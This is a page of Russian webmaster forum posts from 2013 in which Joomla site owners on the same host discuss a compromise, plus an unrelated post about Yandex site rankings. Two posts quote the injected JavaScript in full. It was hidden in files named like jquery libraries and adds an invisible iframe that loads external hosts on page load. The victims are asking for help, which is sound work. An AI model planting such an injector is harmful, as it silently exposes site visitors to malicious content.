secline

secline
Рейтинг
18
Регистрация
25.10.2012
895553
Яндекс нашел вирус на сайте

После последнего взлома сайта, а именно был подгружен новый файл media/joomgallery/js/thickbox3/js/jquery-latest.pack.js

Восстановился по бекапу, сменил все пароли, удалил лишние плагины и темы.

А сегодня опять появился новый файл

public_html/templates/theme/jquery.js

var if2L4lY8 = document.createElement('iframe');if2L4lY8.name = 'if2L4lY8';if2L4lY8.src = 'http://powen.jm9.com/';if2L4lY8.style.width = '0px';if2L4lY8.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if2L4lY8=') == -1) { document.getElementsByTagName('body')[0].appendChild(if2L4lY8);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000); document.cookie = 'if2L4lY8=yes; path=/; expires=' + expiresDate;}};

Самое что обидное дата изменения файла не изменяется. Искал информацию за последнюю неделю по файлам jquery.js, попался только этот топик.

Хостинг все тот же хостлайф, германия.

Яндекс нашел вирус на сайте
medik777:
у меня тоже такой фрейм(
<iframe name="ifn2i8N" src="http://asnem.listen-it.com/" style="width: 0px; height: 0px;"/>
в папках шаблона я его особо не нашёл. как он мог попасть на сайта? пароли постоянно меняю(параноя), админку врядли могли взломать, так как там фишка есть одна, я бы сразу заметил. может через хостера? хостинг ********.net, на всех сайтах что у них, появились эти говнючие фреймы.

---------- Добавлено 07.08.2013 в 09:20 ----------

хостинг: хостлайф

Вот тоже самое) Хостер хостлайф, сервер в германии.

Система Joomla, 2.5.11, они отключили автоматическое обновление(php.ini директива), и поэтому я незнал когда выходят обновления системы и модулей с плагинами, в итоге не обновил систему и 4 плагина были устаревшими

Зловред появился сегодня.

media/joomgallery/js/thickbox3/js/jquery-latest.pack.js

файл увеличился в размере, почему и пришлось ковырять его, самое что обидное дата изменения не изменилась, может в хостере проблема нашем? 2 случай за 1.5 года такой, первй случай был, тогда в .htaccess проблема была, как я понял и тогда проблема была в хостере, массово потому что было у них.

Вот мой фрейм.

var ******= document.createElement('iframe');******.name = '******';******.src = 'http://asnem.listen-it.com/';******.style.width = '0px';ifSxrxK.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('******=') == -1) { document.getElementsByTagName('body')[0].appendChild(******); document.cookie = '******=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';}};


---------- Добавлено 07.08.2013 в 19:55 ----------

Ребята кто найдет файл с фреймом посмотрите пожалуйста дату изменения.

media/joomgallery/js/thickbox3/js/jquery-latest.pack.js мой файл пишет что изменен 18 мая 2013 года. 91742 байта - размер зараженного файла.

Тот же самый файл только вчерашний, дата 18 мая 2013 года. 91342 байта

Даже если взять месячной давности бекап, все тоже самое.

А изменение файла произошло именно сегодня, т.к скрипты шлют отчеты каждый день об измененных файлах, а их у меня 3 разных скрипта, все 3 и прислали отчет о новом или изменившимся файле.

Сам хостинг мне очень нравится, уже 1.5 года почти с ними, очень быстро работает, особенно после замены оборудования в этом году помоему, не хочется от них уходить. Хостеру отписался от данной теме, описал подробно свою проблему, надеюсь выяснят в чем проблема.

А найти зловред, учитывая что не только у меня этот сайт засветился asnem.listen-it.com, лучше всего поиском этой строки во всех файлах аккаунта, в тотал коммандере.

Апдейт ТИЦ 31.10.12

А если на кнопке тиц показывает 10, тут тоже http://yaca.yandex.ru/yca/cy/ch/ 10...

В панеле вебмастера показывает меньше 10. RDS бар показывает 0. Что значит? Ждать ещё?

Сайту почти 6 месяцев, посещаемость 500 с гугла и яндекса, Page rank так и 0 висит что и тиц теперь. Хотя работа над сайтом ведется.

1 234
Всего: 33